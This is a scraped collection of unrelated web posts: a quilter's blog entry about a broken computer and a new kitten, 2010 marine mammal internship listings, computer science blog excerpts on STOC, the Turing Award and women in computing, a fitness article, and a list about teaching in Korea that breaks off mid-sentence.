Over the years, the only thing that remains from "my computer" is the box. I think every single component has been upgraded, removed, replaced or just thrown out. But I still think of it as mine.
Last week one of the memory drives went kaput. Y tried to save what he could, and rebooted everything. I started to save all my work, and anything I actually cared about on an external drive. We got that up and running, and so for now we have a Microsoft default screensaver and about 3 programs.
None of my graphic programs would work, the whole computer would shut down. All we have is paint. I don't even know how to use that. Even my phone has more functions that my computer right now. But I hate to think that this old box will have to go, we've been through so much!
I really wanted to blog about my Sew Lux BOM, or my I Heart you quilt, I took pictures, but they really need some working on, I can't even crop.
I'll just have to write about them, and take more pictures later.
I am really, really enjoying this BOM. I like to wait until I have 2 blocks and then make them together. They're quick and easy to put together, and so much fun. It's a lot less stressful, I don't have to worry that I'm taking too long, or getting bored, I'm just sewing them as they come.
I will definitely be joining in the next BOM, which is supposed to be up for viewing next month.
old BOM pictures
My I Heart You quilt is so close to being finished! I completed the top panel and cut the border. I have the binding all cut and pressed, I just need to buy some plain white backing and filling. I think I'll go simple with straight lines. I still need to my master free form quilting!
I can't wait to share it, I am so proud of myself, I truly love that pattern.
What a boring post without any pictures, but I do have one to share!
2 weeks ago we got a new kitten, Y picked him out and gave him his name- Albert. I think he looks like one, he's got a little beard and I think he's quite smart.
He's a fun little guy, way to energetic! I love the little guy and he's growing like crazy, I just think of him 3 weeks ago when we picked him out how absolutly tiny he was!
I know right now we sometimes have a hard time keeping up with him, but that soon he'll just be a lazy cat and we'll miss those days he always wanted to play.
Now, if I thought taking pictures of food and fabric was difficult- taking a picture of a kitten is way harder!
Meet Albert â¥
|Employment: photoID internship in North Carolina!|
Bottlenose Dolphin Photo-ID Internship Position for 2010
The Outer Banks Center for Dolphin Research (OBXCDR)/Nags Head Dolphin Watch is currently accepting applications for the 2010 summer season. One internship position is available. The research season is May 15 -September 30. Successful applicants must be able to commit through the end of August.
The Outer Banks Center for Dolphin Research is a non-profit organization dedicated to the conservation of bottlenose dolphins in the Outer Banks, NC. Our programÂ´s goal is to gain an understanding of the population size, movement patterns, and behavioral ecology of coastal bottlenose dolphins in the sounds and coastal waters near the Outer Banks. The OBXCDR currently conducts a photo-identification monitoring study of bottlenose dolphins in Roanoke, Croatan, Albemarle, Pamlico and Currituck Sounds. Data is collected via dedicated small boat surveys as well as opportunistically from a local dolphin watch. This study is a continuation of the long-term study initiated by the Nags Head Dolphin Watch in 1997. Information from the current long-term study will provide a basis for initiation of studies involving habitat utilization, social associations, and anthropogenic effects on the dolphins. For more information about the OBXCDR, please visit: www.obxdolphins.org
The internship position will consist of field research, photo-identification, and environmental education. Responsibilities include:
- Assisting with boat-based photo-identification surveys of bottlenose dolphins, including operating small vessel during surveys, collecting environmental, location, and behavioral data for dolphin groups
- Photo-identification of dolphins in the lab, including photo sorting, sighting data entry, assist in maintenance of long-term photo-id catalog using the program FinBase
- Mate/naturalist duties aboard a local dolphin watch, including educating the general public on dolphins and the sound/marine environment, collecting opportunistic photo-id data, and additional mate duties
This internship is a paid position. Applicants will receive an hourly salary for performing ecotours on the dolphin watch. From May 15- June 11 and August 18- September 30, the intern will conduct mate/naturalist duties and opportunistic photo-id aboard the Nags Head Dolphin Watch for 4-5 days per week. From June 12- August 17, time commitment to the dolphin ecotours will be 2 days per week. During this time, the internship requires a minimum of 30 hours per week, consisting of ecotours, dedicated field surveys, and lab photo-id. The rest of the week, the intern may seek employment in the Outer Banks or have the time off.
Housing: A studio apartment is available for rent in Kill Devil Hills for the duration of the research season ($50 per week), however transportation to and from the Outer Banks as well as to and from the field site is not provided.
The successful applicant would ideally have the following qualifications:
- Minimum of 18 years of age and currently or recently enrolled in a college-level program in marine biology, biology, zoology, or related field
- Strong interest in the marine environment and conservation
- Ability to swim
- Basic computer proficiency in MS Office Access
- Enthusiasm, attention to detail, responsible, and works well on a team
- Field research/small boat operation experience preferred but not required
- First AID/CPR certification preferred but not required
NOTE: The United States Coast Guard requires all passenger vessels to be drug free work environments. In order to work aboard the dolphin ecotours, the intern will be required to pass a pre-employment drug test and to participate in random drug testing during the period of the research season.
Please submit cover letter, resume, and contact information for 3 references via email to: firstname.lastname@example.org Use "Dolphin photo-id internship" in the subject line of the email. All applications will be reviewed; those received by April 1st will be given priority.
Jessica Weiss, M.E.M. Coastal Environmental Management
Scientific Advisor, Outer Banks Center for Dolphin Research
7517 Virginia Dare Trail
Nags Head, NC 27959
|Volunteering: Stranding Department!|
STRANDING DEPARTMENT INTERNSHIP ANNOUNCEMENT
The Stranding Department of The Marine Mammal Center is seeking applicants for internships working with stranded pinnipeds, cetaceans and sea otters. These positions are unpaid.
Internship Opportunities are available at the following locations.
- San Luis Obispo Operations in Morro Bay
- Monterey Bay Operations in Moss Landing
- Main Hospital in Sausalito
The Stranding Department Internship is an exciting opportunity for individuals who are interested in increasing their experience and knowledge of marine mammal behavior and the Marine Mammal Stranding Network. Interns will be responsible for answering the animal hotline and rotating the after hours on-call. Interns will coordinate rescue and triage response throughout the Center's 600-mile rescue range. Interns will have the opportunity to participate in marine mammal rescues and releases. In addition, interns will be required to assist with animal care duties (feed preparations, medical charting, and pen cleaning) for all on-site pinnipeds. Other duties may include: participation in training classes, data entry and tracking, maintaining rescue equipment and assorted miscellaneous tasks.
Intern Responsibilities & Qualifications:
The internship is open to all applicants 21 years of age or older, with an avid interest in marine biology, zoology, general biology, policy or a related field. If the intern intends to receive university credit for their internship, they are responsible for making all arrangements with their educational institution. Interns must be able to work for a minimum of 3 months, 5 days a week, at least 40 hours per week. Work schedule must be flexible and may include weekends and holidays. This is an unpaid position and all interns are responsible for obtaining housing and transportation. Applicants should demonstrate excellent communication skills and have practical computer knowledge with programs such as Word, Access, and Excel. This internship position involves a fair amount of physical activity, such as: lifting, restraining and moving animals.
Interested applicants are encouraged to submit a r?sum? that includes the names of three references, and a cover letter detailing interests, experience, housing accommodations, and availability. Please forward all application materials to the following address:
The Marine Mammal Center
2000 Bunker Road
Sausalito, California 94965
Attn: Erin Brodie
Or via email to: BrodieE@TMMC.org
There is some flexibility on the start date of each position, with the earliest start date of February 1 and the last available internship beginning June 14.
Internship Period: February 8, 2010
Application Deadline: February 12, 2010[justify]
Notification of acceptance: February 19, 2010[/justify]
Approximate Internship Time: April - June 2010
Internship Period: February 8, 2010
Application Deadline: February 19, 2010
Notification of acceptance: February 26, 2010
Approximate Internship Time: June - August 2010
Internship Period: June 7, 2010
Application Deadline: June 11, 2010
Notification of acceptance: June 14, 2010
Approximate Internship Time: August - Sept. 2010
Internship Period: July 19, 2010
Application Deadline: July 23, 2010
Notification of acceptance: July 26, 2010
Approximate Internship Time: Oct - December 2010
Celebrating its 35th year in 2010, The Marine Mammal Center is a non-profit hospital dedicated to the rescue and release of sick, injured or orphaned marine mammals, and to research about their health and diseases. Volunteers and staff have treated more than 15,700 California sea lions, elephant seals, porpoises, and other marine life. The Center uniquely combines its rehabilitation program with scientific discovery and education programs to advance the understanding of marine mammal health, ocean health and conservation. For more information, please visit our website at www.marinemammalcenter.org
|Volunteering: photoID in Cardigan Bay!|
The Cardigan Bay Marine Wildlife Centre (New Quay, West Wales, UK) is seeking a Voluntary Assistant Photo-ID Catalogue Officer for the 2010 field season.
The primary purpose of our ongoing research, supported by Environment Wales and the Wildlife Trust of South and West Wales, is to monitor the marine mammal populations found within Cardigan BayÂ´s Special Area of Conservation (SAC) and beyond. Using non-invasive photo-identification techniques, we are endeavouring to establish the size and health of the population as well as reproductive and survival rates.
We need a committed volunteer to work at the Cardigan Bay Marine Wildlife Centre between April and October 2010.
- Main responsibility will be to assist with the cataloguing of the bottlenose dolphin photographs for the photo-ID purposes of the CBMWC, including matching individuals to previous year?Â´ images.
- Giving talks on the photo-identification work conducted at the CBMWC to interested parties.
- Co-ordinate and organise other volunteers participating with the photo-ID work at CBMWC, to tie in with the daily rota.
- Be responsible for training new volunteers in the analysis of photo-ID images, transferring images from memory cards to the Photo-ID computer and ensuring that all images are stored in the correct folders on the computer, e.g. week, date and trip folder and encounter folder if there is more than one per trip.
- Production of up to date procedures for all aspects of the photo-ID work in order that other volunteers can use them in order to complete any photo-ID tasks required of them.
- Ensure that all 2010 images and data are backed up on a regular basis throughout the season (external hard drive, DVDs or CDs) so that there is more than one copy in existence in case of computer failure.
- At the end of the 2010 season help to compile a photo-ID catalogue that includes images from 2009 and 2010 and information and data on what, where and when animals were seen.
There will also be the opportunity to assist with the boat and land-based dolphin surveys and help in the Visitor's Centre.
Desired skills and qualifications:
- Fluency in English (essential)
- IT skills
- Able to work well in a small team and independently without supervision
- Willingness to work in a conscientious, responsible and reliable manner
- Enthusiastic and hard working
- An interest in wildlife and conservation
- Experience working with the public, and public speaking would be useful
- An interest and knowledge of British cetaceans would be an advantage
- A background in biology, particularly marine biology/environmental science would be useful
- Excellent verbal and written communication skills
The Voluntary Assistant Photo-ID Officer role requires a commitment of at least four months, including July to October. Preferably you would be able to commit for the entire field season April-October. Volunteers living locally who are available on a part time basis are also welcome to apply.
Accommodation and expense arrangements:
Basic, shared accommodation can be arranged for approximately ?55 per week. Volunteers are responsible for their own food, travel and accommodation costs.
About the Cardigan Bay Marine Wildlife Centre (Est.1996):
The Cardigan Bay Marine Wildlife Centre is a non-profit organisation
dedicated to promoting public awareness of the marine species, habitats and conservation of the marine wildlife in Cardigan Bay through research and education. The group is affiliated to the Wildlife Trust of South and West Wales and supported by Environment Wales. The centre is in the heart of New Quay overlooking the beautiful beach and harbour. It is used as a base for our research and also includes our Visitor Centre.
Contact Laura on 01545 560032 or email@example.com
Visit our website www.cbmwc.org
How to apply:
Please contact us by e-mail firstname.lastname@example.org to request an application form and further details.
Cardigan Bay Marine Wildlife Centre
Patent Slip Building
Wales, SA45 9PS
Ffon/Phone: 01545 560032
|Volunteering: Alaska!|| |
Petersburg Marine Mammal Center Internship Opportunity - 2010
- Staff the Center during open hours. Manage operations, sales and petty cash.
- Interpret Alaska marine mammal information for Center visitors and public.
The volunteer will be accommodated in Forest Service housing near the center of town, making it easy to access to the community and to the Center. The room is shared so both interns must be of the same gender.
- desire to gain skills in the environmental education field
This is currently an uncompensated internship (other than the housing provided).
|What Makes a Great Definition||Too often we see bad definitions, a convoluted mess carefully crafted to make a theorem true. A student asked me though what makes for a great definition in theoretical computer science. The right definition can start a research area, where a bad definition can take research down the wrong path.|
Some goals of a definition:
A great definition drives theorems not the other way around.
Sometimes you discover that a definition does not properly capture a phenomenon--then you should either change or discard your definition, or change your understanding of the phenomenon.
Let's go through an interesting example. In 1984, Goldwasser, Micali and Rackoff defined $k$-bits of knowledge interactive proof systems. Did they have good definitions?
|Peter Wegner (1932-2017)||passed away yesterday morning at the age of 84. As a child he escaped Stalinist Russia and Nazi-occupied Austria the latter via the Kindertransport to England. Wegner would go on to be an important computer scientist at Brown working on CS research and education.|
With Dina Goldin, Peter Wegner developed a notion of interactive computation and used it to argue for the incompleteness of the Church-Turing thesis. While I didn't agree with this interpretation, I appreciated Wegner's efforts to understanding the basic nature of computing. Peter Wegner later organized an ACM Ubiquity Symposium What is Computation? where he sought many view on the question, including my own.
Peter Wegner said "In computer science we work with possibilities and hope weâll someday be able to solve them." Here's to all things possible.
|Lessons from Norway||For the last two weeks, the wife and I took a vacation to beautiful Norway to see the fjords and the North Cape, effectively the northernmost point in Europe. It was a visit though to the Norwegian Petroleum Museum in Stavanger that inspired this post.|
The discovery of oil in the waters off Norway in 1969 completely changed the Norwegian economy, changing the way of life from a difficult agriculture and fishing society to a more comfortable oil-based economy. The museum had a surprisingly good introductory movie "Oil Kid" describes the challenging relationship of a man with his father who drew a comfortable life as an oil worker. Oil may have made Norway complacent as it lags behind its Scandinavian neighbors in non-oil based technological innovation.
The Norwegian government declared that the oil belonged to the people and created a fund that now totals nearly a trillion US dollars, over $150,000 per Norwegian citizen. Nevertheless as the price of oil remains low, Norway risks challenges as a country reliant on its production.
Norway now aims to be energy-neutral in the near future with extensive hydropower and wind mills. Norway has the highest percentage of electric cars of any country. The tiny town of Eidfjord, population about 1000, has a Tesla charging station. Odd to see this from a major oil exporter.
As computer scientists we have "struck oil," also leading a revolutionary change to our economy with its winners and losers. In fifty years will we look back and regret what we have wrought?
|What are the top Computer science programs for women?||What are the top Computer Science Programs for Women?|
How would one even answer the question?
Some people did a study based on National Center for Education Statistics and Payscale. The results are here.
1) While I believe the top X school listed are pretty good for women in computing I don't believe that (say) the Yth school is better than the (Y+1)th school for some values of X and all values of Y.
2) I appreciate that they put in the work for this.
3) Overall good news and bad news:
The number of female professionals in computer science has fallen by 35% since 1990
The number of women finishing a comp sci degree has increased by 75% in the last five years.
4) Why do we care? If there are many talented people in group X who are being discouraged from going into field Y, but society needs more people in field Y then YES we should do something about that. Also, if a certain group of people is shut out then a group-think might occur.
5) What to do? Organizations like Girls who code are good. The younger they start the bettter.
6) Is there a social stigma for women to go into computer science? I think the answer is yes. How can we break that stigma? Realize that the notion of a female lawyer or doctor at one time had a stigma but I don't think it does anymore. What did they do right? What are we doing wrong?
7) Personal note:
I have mentored 58 High School Students. 56 were male, 2 were female.
I have mentored 45 ugrad students. 33 were male, 12 were female.
I have supervised 17 Masters students. 15 were male, 2 were female
I have supervised 7 PhD students, 6 were male, 1 was female.
The HS students stats are the most startling (at least to me). I don't have much control on this one as HS students seek me out and they happen to mostly be male. Reading that over it sounds weak on my part.
|50 Years of the Turing Award||celebration of the 50th anniversary of the Turing Award. Every recipient got a deck of Turing Award playing cards and the ACM unveiled a new bust of Turing perfect for selfies.|
The conference featured a number of panels on different challenges of computer science from privacy to quantum. Deep Learning formed a common thread, not only did it have its own panel but the Moore's law panel talked about specialized hardware for learning and deep learning causes concern for the privacy and ethics panels. Even quantum computing used deep learning as an example of a technology that succeeded once the computing power was there.
The deep learning panel focused on what it can't do, particularly semantics, abstraction and learning from a small or medium amount of data. Deep networks are a tool in the toolbox but we need more. My favorite line came from Stuart Russell worried about "Grad Student Descent", research focused on parameter tuning to optimize learning in different regimes, as opposed to developing truly new approaches. For the theory folks, some questions like how powerful are deep neural nets (circuit complexity) and whether we can just find the best program for some data (P v NP).
The "Moore's Law is Really Dead" panel joked about the Monty Python parrot (it's resting). For the future, post-CPU software will need to know about hardware, we'll have more specialized and programmable architectures and we'll have to rely on better algorithms for improvement (theory again). Butler Lampson said "The whole reason the web works is because it doesn't have to." I don't remember how that fit into the discussion but I do like the quote.
The quantum panel acknowledged that we don't quite have the algorithms yet but we will soon have enough qbits to experiment and find ways that quantum can help.
You can watch the panels yourself, but the real fun comes from spending time with the leaders of the field, and not just theory but across computer science.
|Best. STOC. Ever.|
By the numbers: 370 attendees, 46% students. 103 accepted papers out of 421 submitted. These numbers are moderate increases over recent years.
The Panel on TCS: The Next Decade talked about everything but the next decade. A few of my favorite quotes: "Hard instances are everywhere except where people care" (Russell Impagliazzo, who walked back a little from it later in the discussion). "I never know when I proved my last theorem" (Dan Spielman on why he keeps trying). Generally the panel gave great advice on how to do research and talk with other disciplines.
Avi Wigderson argued that theory of computing has become "an independent academic discipline" which has strong ties to many others, of which computer science is just one example. He didn't quite go as far as suggesting a separate department but he outlined a TCS major and argued that our concepts should be taught as early as elementary school.
Oded Goldreich received the Knuth Prize and said that researchers should focus on their research and not on their careers. The SIGACT Distinguished Service Award went to Alistair Sinclair for his work at the Simons Institute.
Oded apologized for lying about why he was attending STOC this year. TheoryFest will be a true success when you need reasons to not attend STOC. All happens again next year in Los Angeles (June 23-27) for the 50th STOC. Do be there.
|Theory Jobs 2017||In the fall we point to theory jobs, in the spring we see who got them. Like last year and years past I created a fully editable Google Spreadsheet to crowd source who is going where. Ground rules:|
|Who Sets Policy?||In April the New York Times Magazine ran an article Is it O.K. to Tinker with the Environment to Fight Climate Change? The article asks about the ethics of even running tests on such methods and has this quote froms David Battisti, an atmospheric scientist at UW.|
Name a technology humans have developed that they haven't used. I can't think of any. So we can work on this for sure. But we are in this dilemma: Once we do develop this technology, it will be tempting to use it.The article skirts the question on who makes this decision. Maybe the United Nations after some unlikely agreement among major powers. But what if the UN doesn't act and some billionaire decides to fund a project?
As computer scientists we start to face these questions as software in our hyper-connected world starts to change society in unpredictable ways. How do we balance privacy, security, usability and fairness in communications and machine learning? What about net neutrality, self-driving cars, autonomous military robots? Job disruption from automation?
We have governments to deal with these challenges. But the world seems to have lost trust in its politicians and governments don't agree. How does one set different rules across states and countries which apply to software services over the Internet?
All too often companies set these policies, at least the default policies until government steps in. Uber didn't ask permission to completely change the paid-ride business and only a few places pushed back. Google, Facebook, etc. use machine learning with abandon, until some governments try and reign them in. The Department of Defense and the NSA, in some sense industries within government, set their policies often without public debate.
What is our role as computer scientists? It's not wrong to create the technologies, but we should acknowledge the ethical questions that come with them and what we technically can and cannot do to address them. Keep people informed so the decision makers, whomever they be, at least have the right knowledge to make their choices.
|Graduation from the Other Side|
I've attended many graduations in my time, mostly as faculty, a couple of times as a student or a brother. This last weekend I attended my first university graduation as a parent as my daughter Annie graduated from Brandeis University in Waltham, Massachusetts. Brandeis has a big graduation ceremony with lots of speeches and then different departments or groups of departments have their own diploma ceremonies with their own speakers and where they give out the actual diplomas.
Brandeis gives out a number of honorary doctorates each year and for the first time gave one to a computer scientist, Turing Award Winner Leslie Lamport. Lamport received his PhD at Brandeis in math in 1972 before they had a CS deparment but now he has an (honorary) PhD in Computer Science. Lamport gave an eight-minute talk in the School of Science ceremony. But when you are a parent the weekend is about your child and my daughter didn't graduate from the school of science so I didn't see the Lamport talk.
In the main ceremony, Brandeis has not only an undergrad give a speech but also a grad student. Sounds like a crazy idea, but Vivekanand Vimal, Neuroscience PhD, gave what could be best described as a performance art. Since I can't find the video of Lamport and you probably don't want to see my videos of Annie, enjoy the new Dr. Vimal's ode to the craziness of the PhD and saving society.
|Fitness and Exercise Prevent Disease||Fitness and exercise prevent disease. That is a proven fact, and yet more Americans than ever are suffering from obesity and type two diabetes are considered an epidemic in the United States. If you are overweight, and especially if you are obese, or if youâve been diagnosed with diabetes, then listen to your doctor and begin a regular fitness and exercise program. Youâll be glad you did.|
One of the benefits of fitness and exercise, as any physician will tell you, it that fitness and exercise help control blood sugar. A diabetic who takes medication daily may find that less medication is needed with a regular fitness and exercise program. Many diabetics who stay with fitness and exercise programs find that they are able to quit the medication and get their diabetes under control in a totally natural way.
Triglycerides are also too high for most Americans. High triglycerides are linked to heart disease, including heart attacks and strokes. A great natural way to reduce your level of triglycerides is to simply begin and stick with a fitness and exercise program, while eating a sensible diet. Triglycerides at too high a level are also linked to high blood sugar, and it is common for diabetics to have high triglyceride levels. Therefore, in this case fitness and exercise can take care of two potential health risks at the same time.
Many people have marveled at the way being over weight has become an American way of life, and wondered what caused it. Many point to sedentary lifestyles, working in front of computers, and watching too much television. In addition, many Americans eat diets high in fat and carbohydrates. Whatever the root causes fitness and exercise can be a major part of the cure for this problem. Engaging in physical activity, increasing the heart rate, and just getting active can help a person loose weight, control triglyceride levels and improve diabetes and should not be ignored. Parents should restrict time spent by children with video games or watching television and encourage them to engage in fitness and exercise the way children in past generations have, playing games like baseball, basketball and jump rope. Children who learn the benefits of fitness and exercise at an early age will go into adults, who enjoy fitness and exercise, lead healthier lifestyles and tend to live longer, healthier and obviously happier lives.
|Car As Platform||LTE Will Let Your Car’s Computer Update Like Your Smartphone. Think about it: The average person hangs onto a car for about 11 years. The average lifespan of a computer or tablet or smartphone is, what, three at the high end? So that super-slick infotainment setup in the center console is gonna feel pretty dated […]|
|My 10 Favorite Things About Living and Teaching in Korea||I'm two days away from leaving Korea. In two years of living here, I have developed deeply ambivalent feelings about both my experience here and the society itself. A couple days ago, I was re-reading The Prophet, and I was surprised to find a section that echoed my feelings about leaving Korea:|
The hero has been in a strange land for twelve years and upon seeing the ship that will return him to his homeland...
"the gates of his heart were flung open, and his joy flew far over the sea. And he closed his eyes and prayed in the silences of his soul.
But as he descended the hill, a sadness came upon him, and he thought in his heart: How shall I go in peace and without sorrow? Nay, not without a wound in the spirit shall I leave this city.
Long were the days of pain I have spent within its walls, and long were the nights of aloneness; and who can depart from his pain and his aloneness without regret?
Too many fragments of the spirit have I scatterd in these streets, and too many are the children of my longing that walk naked among these hills, and I cannot withdraw from them without a bruden and an ache.
It is not a garment I cast off this day, but a skin that I tear with my own hands.
Nor is it a thought I leave behind me, but a heart made sweet with hunger and with thirst.
Yet I cannot tarry longer.
The sea that calls all things unto her calls me, and I must embark.
For to stay, though the hours burn in the night, is to freeze and crystallize and be bound in a mould."
A bit dramatic perhaps, but it really nails how I'm feeling. But, moving along... last week I posted my 10 least favorite things about living and teaching here, and here are my 10 favorite things about living and teaching here, plus a few runners-up.
Ice cream bars -- This didn't make the top ten because it has been absolutely disastrous for my fitness. At every convenience store, and they're everywhere, there is a freezer full of delicious ice cream on a stick in every flavor you could imagine and more (one of my favorites is a chocolate bar on a stick, surrounded with "nano-silver vanilla", coated with chocolate and peanuts, another is melon, another still is watermelon flavored and shaped ice cream with hazelnut seeds). A full price bar is 700 won ($.55), and most places sell them at half price. I don't know how that can be profitable (and I probably don't want to), but it sure does make for a delicious, fattening summer.
Elders' robustness -- Before the monsoon came with its endless days of rain, I was playing tennis every morning with a 64 year old man that was in nearly as good of shape as I am. I never saw him eat an ice cream bar. On my way to school, I routinely see 80-something year old men and women hunched over working in the fields, digging up potatoes or planting chili pepper plants. I've never seen them eating ice cream bars either.
Lack of zoning -- Where I come from, an area is either commercial or residential, so people end up driving a lot. Here, everything is mixed together, so people walk. On one level, it's nice to have a convenience store (with ice cream bars) in the same building as my apartment. On another level, it gets people out in the streets and creates a mixing of people and a sense of community involvement that I think we could use more of at home.
Free time -- I am ambivalent about this. Every single day here, I've had hours of free time. I play guitar, watch TV, read, watch movies, cook, paint, play online games, meditate, etc. I have learned a lot from the reading I've done, I'm a better guitarist and singer and cook, and I'm a champion of Settlers of Catan (my online game of choice), but I'm also bored a lot and frequently feel like I'm wasting my life away. It is that feeling that compelled me to take the plunge into grad school at the end of my contract here.
Now, to the top ten....
10. Gardens everywhere --
This province, Gangwon-do, is notorious in Korea for being difficult to grow food. The people respond by growing food absolutely everywhere. Any land that is less than a 15% incline and is not paved over is growing food, without exception. That's true whether it's someone's front yard, a triangle of dirt between a bridge and road, or way up in the valleys that surround the towns. They're not farms, much more like what we think of as gardens. They grow chili peppers, corn, soy beans, onions, garlic, potatoes, greens, grapes and on the occasional flat section of land, rice. This is this old couple's yard. It's worth noting that it's September and they're planting, probably the third crop of the year. I'm certain they would think we are insane for the money, effort, fertilizer and pesticides we put into grass.
9. Jjimjilbang -- These are combination health club, sauna and recreation center. Admission is about $5 and for that you soak in hot tubs infused with jade or eucalyptus or whatever, sweat in the saunas and steam rooms, and get a sports massage or a scrub down from an old Korean man wearing nothing more than briefs. There are restaurants, but for reasons that escape me Koreans seem to prefer to pig out on hard boiled eggs at these places. There are barbers and televisions and computers and massage chairs and cold and hot rooms and salt rooms and charcoal rooms and oxygen rooms. A great place to hang out and warm up in the winter or sweat out in the summer.
8. Outdoorsiness -- Koreans love the outdoors, whether eating squid jerky and drinking rice wine behind an apartment building, or hiking through valleys (which they have done an excellent job of protecting by concentrating in the cities the population of 50 million people in a country the size of Indiana). I love the tendency toward the outdoors, especially in summer, when restaurants pull out their plastic tables and the dining room floors spill out into the streets. The images of dozens of Koreans eating, drinking and laughing in a courtyard on a warm summer night will stay with me for a long time.
7. The sweet kids --Not all of them were, but the ones that were sweet were the cutest, kindest, funnest kids I've ever known.
6. The restaurants & the food -- A lot of foreigners here complain about the cuisine, and while I admit the flavors can get a bit monotonous (sesame oil, soy sauce, garlic and chilies), I love the food, even though much of it is off limits to me as a vegetarian. Restaurants typically specialize in just a few dishes, are usually owned and run by an old lady who might work with one other old lady to prepare the food, serve the food, clean the place and everything. My favorite restaurant in town is a place where a 4' 6" 60 year old lady serves grilled fish lettuce wraps (I'm a quasi-vegetarian here) and seems to rotate through being amused, confused, appreciative and fed-up with the foreigners that frequent her place. The prices, and there's no tax or tipping, so what you see on the menu on the wall is what you actually pay, for a typically quick meal might be $3, and unless it's a very special dish (or foreign food or drink), meals rarely exceed $10 per person.
Every meal comes with bancheon, side dishes, that always include kimchi and usually other fermented vegetables. In a cheap place, you might just get three little kimchis, in a nicer place, it's not uncommon to get over ten bancheon, and they might include fried fish or raw octopus or other treats that can be even better than the central meal itself. In most cases, everything is shared with everyone at the table. In fact, when eating with Koreans, even glasses are shared -- it's a neat little social device... if you see that someone is bored or if you want to chat with someone that you're not sitting near, you take them your empty glass and a bottle of soju (chemically fermented rice wine) and pour them a shot, and in that manner, over a meal that might last a few hours, people move around (everyone sits on the floor) and everyone talks with everyone, everyone shares germs and everyone gets drunk.
5. Community focus -- This is the highest ranking item that is really about Korean society, as the next four each have to do with my position here. On the whole, I'm not a big fan of Confucianism, at least as it operates in modern Korea. However, the focus on social harmony is really nice, and something that I think we North Americans could learn a lot from. Where I is the dominant pronoun in the US, we is here. Studies have shown that the different mindsets actually affect visual perception, such that Asians are more inclined to view ambiguous situations from a removed, more holistic perspective, whereas Westerners are more inclined to view the same situation from inside it, from a first person perspective. Unfortunately, because of the xenophobia here, foreigners are not always considered part of the community in the same way Koreans are, which I think makes being a foreigner here harder than it would be in a more individualistic society like the US. But, while I'm sure my Korean friends still think I'm terribly obstuse and inconsiderate, this mindset has implanted itself in my head, and I'm glad for it. I hope it stays with me through the years.
4. Income:expenses ratio -- The salary foreigners earn teaching in Korea isn't anything special, except that foreign teachers' apartments are paid for by employers, as are airfare here and home and immigration costs. Food is cheap, entertainment (at least out here in the boonies) is scarce, and buying stuff doesn't usually make sense when you know you have to fit everything you own into two suitcases at the end of the year. Health care is nationalized and very inexpensive and the tax structure is very progressive so even those who aren't exempt pay less than 4% income tax. I have been saving almost 80% of my salary, and on top of that I'll receive about two months' bonus pay at the end of my contract. No one has gotten rich doing it, but especially for folks right out of college or when the job market at home is what it is right now, it can be a very solid financial move.
3. Vacation time & neighboring destinations -- While I've been here, I've spent time in China, Vietnam, Laos, Japan, Thailand, and Thailand again. Spending almost the entire month of February in Thailand is about as good as it gets. And it was a relatively quick flight on a lovely Asian airline to get there.
2. Novelty in everything -- Living here is a bit like being a child. You never really know what's going on, you don't have responsibilities the same way you would at home, you're easily surprised, and routine events are novel and exciting. It's incredibly frustrating, but also really enjoyable.
1. Anonymity & outsiderness -- There is something comforting about knowing that no one knows you, and that no one can. If people are going to stare at me as I walk down the street, I might as well wear shorts and flip-flops and sing as I walk. If my students are going to think I'm a weird foreigner anyway, it's much easier to engage them with silly foolishness that I might hold back at home. At home, as soon as you see someone, you thin-slice their age, sex, body language, clothing, and a thousand other things and make a judgement about who they are and how they relate to you in society. In a culture as foreign as this, that's impossible. Advertising doesn't affect you, because it is designed to take advantage of the human mind's inability to stop thin slicing. And not understanding what that 16 year old girl on the bus won't stop talking about can be really nice.
I couldn't have named this at the time, but this is what brought me back to Korea f